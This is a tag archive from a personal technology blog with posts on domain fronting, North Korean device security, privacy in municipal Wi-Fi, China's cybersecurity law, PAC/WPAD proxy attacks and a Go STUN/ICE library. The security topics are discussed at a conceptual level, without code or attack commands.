Tag Archives: tech

Another Strike against Domain Fronting

In 2014, Domain Fronting became the newest obfuscation technique for covert, difficult to censor communication. Even today, the Meek Pluggable transport serves ~400GB of Tor traffic each day, at a cost of ~$3000/month.

The basic technique is to make an HTTPS connection to the CDN directly, and then once the encryption has begun, make the HTTP request to the actual backing site instead. Since many CDNs use the same “front-end cache” servers for incoming requests to all of the different sites they host, there is a disconnect between the software handling SSL, and the routing web server proxying requests to where they need to go.

Even as the technique became widely adopted in 2014-2015, its demise was already predicted, with practitioners in the censorship circumvention community focused on how long it could be made to last until the next mechanism was found. This prediction rested on two points:

  1. The CDN companies will find themselves in a difficult position politically, since they are now in the position of supporting circumvention while also maintaining a relationship with the censoring countries.
  2. The technique has security and cost implications that make it not great for either the CDNs, or the practitioners.

We’ve seen both of these predictions mature.

Cloudflare, explicitly doesn’t support this mechanism of circumvention, and coincidentally has major Chinese partnerships and worked to deploy into China. Google also has limited the technique over periods as they have struggled with abuse (although mute in China, since the Google cloud doesn’t work there as a CDN.)

In terms of cost, the most notable incident is the “Great Cannon”, which targeted not only Github as widely reported, but also caused a significant amount of traffic to go to Amazon-hosted pages run by GreatFire, a dissident news organization, and costing them significant amounts of money. GreatFire had been providing a free browser that operated by proxying all traffic through domain-fronting. Due to a separate and less reported Chinese “DDOS” they ended up with a monthly bill for several tens of thousands of dollars and had to turn down the service.

The latest strike against domain fronting is a post a couple weeks back by Cobalt Strike that the technique is also gaining adoption for Malware C&C. This abuse case will further incentivize CDNs from allowing the practice to continue, since there will now be many legitimate western voices actively calling on them to stop. Enterprises attempting to track threats on their networks, and CDN customers wanting to not be blamed for attacks will both begin putting more pressure on the CDNs to remove the ability for different domains to be intermixed, and we should expect to see a continued drop in the willingness of providers to offer such a service.

Koryolink Simulator

When I was in Pyongyang a few years ago and had access to a cell phone, I recorded a bunch of the prerecorded messages that you hear when dialing or mis-dialing numbers. I found them to be an interesting glimpse into the view of technology seen in that corner of the world, and helpfully they were translated into English for my edification. I’ve put them up here, and reconstructed the phone tree you get when dialing 999, so that the different messages can be heard in context.

Privacy issues for City Wi-Fi Deployments

At the end of last month, Seattle posted a request for information exploring the feasibility of a municipal Wireless deployment. With others at the Seattle Privacy Coalition, I draft a response to the city flagging some of the major privacy issues that we hope they will consider in the initiative. I believe these are much broader than just our specific case, and hopefully can help others when navigating the landscape of business models and privacy risks in this area.

Pitfalls of Public Wi-Fi: data selling, tracking of nonusers, injecting ads

Freely available municipal wireless Internet is an exciting service, but there have also been Wi-Fi deployments that have had significant, unintentional impacts on citizen privacy. This brief from the Seattle Privacy Coalition attempts to highlight some of the hidden costs that the City of Seattle should watch out for.

Many freely offered commercial wireless systems make money by selling analytics about customer behavior. An example is the Google-sponsored Wi-Fi provided at SeaTac airport and used in Starbuck’s coffee shops around town. While free to users, these services make money through the sale of user data to third-party advertisers.

This practice is especially questionable when low-income communities are targeted with ‘free’ services, greatly increasing the surveillance burden for an already vulnerable population.

Tracking and profiting from the sale of people’s behavior for advertising or other commercial purposes is a troubling practice at best, but it clearly goes against the public interest when it targets communities depending on a service as their primary or only access to the Internet.

Another threat to privacy found in commercial wireless deployments is the ability to track and analyze the behavior and location of every person in the vicinity, whether they are using the service or not. Cisco’s Meraki, a popular retail wireless product, advertises that it can “Glean analytics
from all Wi-Fi devices connected and unconnected.”

The city, perhaps unlike a business, has a responsibility to protect citizen privacy, and we think it would be irresponsible to track the locations of unconnected devices that have not explicitly opted-in to such a program.

From the start, the City must have a clear understanding of how collected data will be used, and it must not collect any data without the consent of the people tracked. Few citizens will welcome long-term, involuntary behavioral and location logging of their personal electronic devices by the government.

Finally, there are instances of wireless service which are based on a business model of injecting advertisements into web browsing. We merely note this is impossible to do without severely compromising the security of the Internet experience, and we do not believe that any trade off of benefits involving such approaches are justified.

We welcome additional digital connectivity through the city, and are especially excited by the potential for more equitable accessibility. There’s great potential in this technology, and while some incarnations impinge user privacy, many others have found successful models that avoid
such pitfalls.

Thoughts on Wulim

One of the exciting developments at CCC last month was a talk discussing the copy protection features in the Wulim tablet produced by the Pyongyang Information Center. This post is an attempt to reconcile the features they describe with my experience with devices around Pyongyang and provide some additional context of the environment the device exists within.

Threat Model

As mentioned in the talk, the Wulim tablet, and most of the devices available in Pyongyang for that matter, do a good job of defending against the primary threat model anticipated: of casual dissemination of subversive material. To that end, transfer of content between devices is strictly regulated, with watermarking to track how material has been transferred, a screenshot-based verification systems for visual inspection, and technical limitations on the ability to run externally created Applications.

One of the interesting points of note is that the Wulim, and the earlier pyongyang phone from PIC implement much of their security through a system application and kernel process named ‘Red Flag’, which shares an icon and name with the protection system on the Red Star desktop system. While the code is most likely entirely different (I haven’t actually compared), the interesting point is that these implementations come from two separate labs and entities, indicating that there is potentially coordination or joint compliance with a common set of security requirements.

System Security

The Wulim was difficult for the CCC presenters to gain access to. While there were bugs allowing them to view the file system, there was no easy way to casually circumvent the security systems in place. This indicates a general success of the threat model the system was designed to protect against and shows a significant increase in technical proficiency from the 2013/2014 devices. In the initial generations of android-based hardware, most devices had an enabled recovery mode, and the security could generally be breached without more than a computer. The alternative start-up mode found at CCC indicates that the labs are still not deeply familiar with all of the intricacies of Android, and there remain quirks in its operation that they haven’t anticipated. This will likely continue, with a pattern of an attack surface area that continues to shrink as exploits are discovered and make their way back to pyongyang.

The ‘crown jewel’ for this system, it should be noted, is an exploit that the CCC presenters did not claim to have found: the ability to create applications which can be installed on the device without modification. One of the first and most effective security mechanisms employed by the wulim and previous generations of PIC android systems is the requirement that applications be signed with a lab-issued key. While it might be possible that either the security check of applications, or information about the private key might be recovered from a device, this code has likely been checked quite well, and I expect such a major lapse in security to be unlikely.

The presence of this security means that I cannot install an Application on your tablet from an SD card, computer, or via bluetooth transfer if it has not already been pre-approved. This key is potentially shared between KCC and PIC, because the stores offering to install after-market applications around pyongyang have a single list, and are willing to try adding them to systems produced by either lab.

Connectivity

The Wulim is a 2015-2016 model, and evidences a feeling of confidence from the labs that they’ve got the software security at a reasonably appropriate level of security, and are more comfortable opening back up appropriate levels of connectivity between devices. 2013 and 2014 models of tablets and phones were quite limited in connectivity, with bluetooth as a ‘high-end’ option only available on the flag-ship models, and wifi connectivity removed completely. In contrast, the Wulim has models with both bluetooth and wifi, as well as the capability for PPPOE based connectivity to intranet services broader than a single network.

This connectivity extends in two additional ways of note:

  • First, there continue to be rumors of mobile data services being tested for broader availability within the country, and the Gateway mechanism in the wulim presents yet another clue towards how this will manifest down the road. While the wulim tablet does not have 3G connectivity, the same software stack has been seen on phones (for instance the pyongyang phone series with the most recent generation ‘2610’ released in 2015).
  • Second, the same basic android system is being used for wider installations, and is on display in the science and technology exhibition center. In that context, a custom deployment of tablets with modified software have been installed in both tablet and desktop configuration (desktop through USB peripheral keyboards and mice), and are connected through a LAN-local wifi network for searching the library resources on-site.

Tracking

The screenshot ‘trace viewer’ mentioned in the CCC talk is really just a file-system viewer of images taken by the same red flag security tool integrated into the system. The notable points here are that screen shots are taken at regular interval on images not in a predefined white-list, so even if new signed applications are created, there will be an alternative system were their presence can be detected even if they’ve been uninstalled by the user prior to inspection. It’s worth noting that it is more effective against the transmission of images and videos containing subversive content then against applications. Applications in android will likely be able to take advantage of screen-security APIs to prevent themselves from appearing in the list. Or, more to the point, once external code is running, the system age is typically 2-3 years behind current android and one of several root methods can be used to escalate privileges and disable the security measures on the device.

While the CCC talk indicates that images and videos can only be viewed on the device they have been created on, this was not what I observed. It was relatively common for citizens to transfer content between devices, including road-maps and pictures of family and friends. The watermarking may be able to indicate lineage, but these sorts of transfer were not restricted or prevented.

Releasing

Very little underlying data was released from the CCC talk, although they indicate the intention to release some applications and data available on the tablet they have access to. This is unfortunate. The talk, and the general environment has already signaled to Pyongyang that devices are available externally, and much of their reaction to this reality has already occurred. In particular, devices are no longer sold to foreigners within the country regularly, as they were in 2013/14 – with a couple exceptions where a limited software release (without the protections imposed on locals) and on older hardware can be obtained.

The only remaining risk then is the fear of retribution against the individual who brought the device out of the country. The CCC presenters were worried that the device they have may have a serial number tied to an individual. This has not been my experience, and I believe it is highly unlikely. Cellphones with connectivity do need to be attached to a passport at the point of sale, but tablet, as of spring 2015 continue to be sold without registration. The serial numbers observed by the CCC presenters are version numbers common to the image placed on all of the tablets of that generation released.

First-party Google Analytics

Third party analytics services are suffering from the growing prevalence of ad blocking, tracking protection, and the trend of minimizing connections and requests. However, from a site owner perspective, receiving usage information remains important for measuring site growth.

My expectation is that we are already on the curve where ads and tracking software will be more tightly integrated into websites and make it significantly more difficult for clients to disambiguate
“good” and “bad” scripts, which are mostly done today from the URL.

Google already provides the tools needed to relay analytics communication through a third party server, and it took under an hour to put together a proof of concept that removes the final third-party requests that are required when viewing this page. In essence, my server proxies all the requests that would normally go to Google, and adds on a couple extra parameters to track who the real client is.

The modified loading script for google analytics, and the corresponding nginx configuration to make my server a relay are here.

Thoughts on China’s Updated Cyber-security Regulations

On Monday, China ratified an updated cybersecurity legislation that will enter effect next June. The policy regulates a number of aspects of the Chinese Internet: What data companies need to keep on domestic servers, the interaction between companies and the government, and the interaction between companies and Chinese users.

Notably, when considering the impact on the Internet, the law include:

  • Network operators are expected to record network security incidents and store logs for at least 6 months (Article 21)
    Note that the punishment for refusing to keep logs is a fine up to 10,000usd to the operator, and of up to 5,000usd to the responsible person.
  • Services must require real-identity information for network access, telecom service, domain registration, blogging, or IM (Article 24)
    The punishment for failing to require identity is up to 100,000usd and suspension of operations.
  • Network operators must provide support to the government for national security and crime investigations (Article 28)
  • If a service discovers prohibited user generated content they must remove it, save logs, and report to the government (Article 47)
    The punishment for this is up to 100,000usd and closing down the website

The concerns from foreign companies seem to center around a couple things: The first is that there’s a fairly vague classification of ‘critical infrastructure’, which includes power, water and other infrastructure elements explicitly, but also refers to services needed for public welfare and national security. Any such service gets additional monitoring requirements, and needs to keep all data on the mainland. Companies are worried they could be classified as a critical service, and that there aren’t clear guidelines about how to avoid or limit their risk of becoming subject to those additional regulations.

The other main concern seems to be around the fairly ambiguous regulation of supporting national security investigations by the government. There’s a concern that there aren’t really any limits in place for how much the government can request from services, which could include requiring them to include back doors, or perform significant technical analysis without compensation.

My impression is that these regulations aren’t much of a surprise within China, and they are unlikely to cause much in the way of change from how smaller companies and individuals experience Internet management already.

Watch your PAC

In the last week at Blackhat / Defcon two groups looked deeply at one of the lesser known implementations of network policy called Proxy Autoconfig. (In particular, badWPAD by Maxim and Crippling HTTPS with unholy PAC by Safebreach.)

Proxy AutoConfig (PAC) is a mechanism used by many organizations to configure an advanced policy for connecting to the Internet. A PAC file is written in JavaScript to provide a dynamic determination of how different connections should be made, and which proxy they should use. In particular, international companies with satellite offices often find the PAC system useful in routing some traffic through a corporate proxy for compliance or geographical reasons while other traffic is routed directly to the Internet.

These two talks both focus on what a malicious individual could do to attack the standard, and each find an interesting line of attack. The first attack is that the PAC file is allowed to make DNS requests in determining how to proxy connections, and in many browsers sees the full URL being accessed rather than only the domain. This means that even when the user is communicating with a remote server over HTTPS, the local network can learn the full URL that is being visited. The second attack has to do with where computers look for PAC files on their local network – for a file called `wpad.dat`.

While there is certainly the potential for an attacker to target a victim through these technologies, they are more accessible and arguably more valuable to a ISP or state level actor interested in passive surveillance. This explicit policy for connectivity is not inherently more invasive than policies employed by many ISPs already, and could likely be deployed on many networks without consumer push-back as a performance enhancement for better caching. It is also appropriate for targeted surveillance, since vulnerability can be determined passively.

The viability of surveillance through WPAD and PACs is a bit of a mixed bag. Most ISPs use DHCP already and set a “search domain”, which will result in a recognizable request for proxy information from vulnerable clients. While organizations often require all clients to enable discovery, this is not true of many consumer machines. Unfortunately, some versions of windows have proxy discovery enabled by default.

The NMAP tool used for network exploration, and pitched towards use as a tool facilitating network attackers, already has support for WPAD. In contrast, the network status and monitoring tools, like Netalyzr and OONI do not yet monitor local proxy status and won’t provide indication of malicious behavior.

Stunning

I’ve started to dive once again into the mess of connection establishment. Network address translation (NAT) is a reality today for most Internet users, and poses a significant hurdle in creating the user-user (or peer-peer) connections. NAT is the process used by your router to provide multiple internal (192.168.x.x) addresses that are all only visible as a single external address on the Internet. The challenge caused by this device is that if someone outside wants to connect to your computer, they have to figure out how to get the router to send their traffic back to you, and not just drop it or send it to another computer on your network.

Without configuring your router to add a ‘port forwarding’ rule, it isn’t supposed to do this, so many of the connection establishment procedures are really ways to trick your NAT into forwarding traffic without realizing what’s happening.

There are two main protocols on the Internet today: UDP and TCP. UDP is stateless, each “packet” of data is its own message, and is self contained. In contrast, TCP is a representation of a longer “stream” of data – many messages are sent with an explicit ordering . TCP is much harder to trick routers into establishing, and there has been little work there.

The current generation of p2p systems are led by high-bandwidth applications that want to offload traffic from central servers in order to save on bandwidth costs. Good examples of these are Google’s hangouts and other VOIP (video over IP) traffic.

These systems establish a channel to send UDP traffic between two computers both behind NAT routers using a system called ICE (interactive connectivity establishment). This is a complex dance with multiple sub-protocols used to try several different ways of establishing connectivity and tricking the routers.

One of the key systems used by ICE is a publicly visible server that speaks a protocol called STUN. STUN servers provide a way for a client to open a UDP connection through their router to a server that is known to be able to receive messages, and then learn what that connection looks like outside of its router. It can then provide that external view of how it’s connected to another peer which may be able to send messages to the same external address and port and have them forwarded back to the client.

One of the unfortunate aspects of this situation is that the complexity of these systems has led to very few implementations. This is unfortunate, since the existence of libraries making it easy to reuse these techniques can allow more p2p systems to continue working in the modern Internet without forcing users to manually configure their routers.

I’ve started work on a standalone go implementation of the ICE connectivity stack. Over the weekend I reached the first milestone – The library can create a STUN connection, and learn the external appearance of the connection as reported by the STUN server.